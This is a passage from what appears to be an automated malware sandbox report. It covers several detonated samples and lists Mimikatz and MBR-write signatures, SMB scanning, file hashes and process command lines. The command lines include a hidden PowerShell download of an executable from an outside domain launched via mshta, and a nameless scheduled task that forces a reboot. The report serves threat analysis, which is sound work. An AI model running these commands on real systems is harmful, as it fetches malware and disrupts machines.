| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
C:\Users\Admin\AppData\Local\Temp\B3F4.tmp
"C:\Users\Admin\AppData\Local\Temp\B3F4.tmp" \\.\pipe\{1C2D00D1-472B-410E-AD18-E8080324C550}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/2100-0-0x0000000001EF0000-0x0000000001F4E000-memory.dmp
memory/2100-8-0x0000000001EF0000-0x0000000001F4E000-memory.dmp
memory/2100-11-0x0000000001EF0000-0x0000000001F4E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B3F4.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/2100-9-0x0000000001EF0000-0x0000000001F4E000-memory.dmp
memory/2100-26-0x0000000001EF0000-0x0000000001F4E000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\javafx-src.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\classfile_constants.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmti.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\ExportExpand.xlsx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed9 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BE7D.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
C:\Users\Admin\AppData\Local\Temp\BE7D.tmp
"C:\Users\Admin\AppData\Local\Temp\BE7D.tmp" \\.\pipe\{6558F945-D5BC-4684-ABFF-EE1F029B4C65}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| N/A | 10.127.0.0:445 | tcp | |
| DE | 136.243.76.21:445 | tcp | |
| US | 52.185.211.133:445 | settings-win.data.microsoft.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| DE | 136.243.76.21:139 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 52.185.211.133:139 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/4428-0-0x0000000002580000-0x00000000025DE000-memory.dmp
memory/4428-8-0x0000000002580000-0x00000000025DE000-memory.dmp
memory/4428-10-0x0000000002580000-0x00000000025DE000-memory.dmp
memory/4428-9-0x0000000002580000-0x00000000025DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BE7D.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/4428-22-0x0000000002580000-0x00000000025DE000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
138s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3124 wrote to memory of 3940 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3124 wrote to memory of 3940 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3124 wrote to memory of 3940 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3124 -ip 3124
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\59460.exe');
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1360
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | french-cooking.com | udp |
| FR | 54.36.91.62:80 | french-cooking.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.91.36.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/3940-0-0x0000000070F0E000-0x0000000070F0F000-memory.dmp
memory/3940-1-0x0000000002DC0000-0x0000000002DF6000-memory.dmp
memory/3940-2-0x0000000005660000-0x0000000005C88000-memory.dmp
memory/3940-3-0x0000000070F00000-0x00000000716B0000-memory.dmp
memory/3940-4-0x0000000070F00000-0x00000000716B0000-memory.dmp
memory/3940-5-0x0000000005400000-0x0000000005422000-memory.dmp
memory/3940-6-0x0000000005D00000-0x0000000005D66000-memory.dmp
memory/3940-7-0x0000000005D70000-0x0000000005DD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hunmatu5.rkt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3940-17-0x0000000005EE0000-0x0000000006234000-memory.dmp
memory/3940-18-0x00000000063A0000-0x00000000063BE000-memory.dmp
memory/3940-19-0x00000000063F0000-0x000000000643C000-memory.dmp
memory/3940-20-0x0000000007A10000-0x000000000808A000-memory.dmp
memory/3940-21-0x00000000068A0000-0x00000000068BA000-memory.dmp
memory/3940-24-0x0000000070F00000-0x00000000716B0000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240903-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
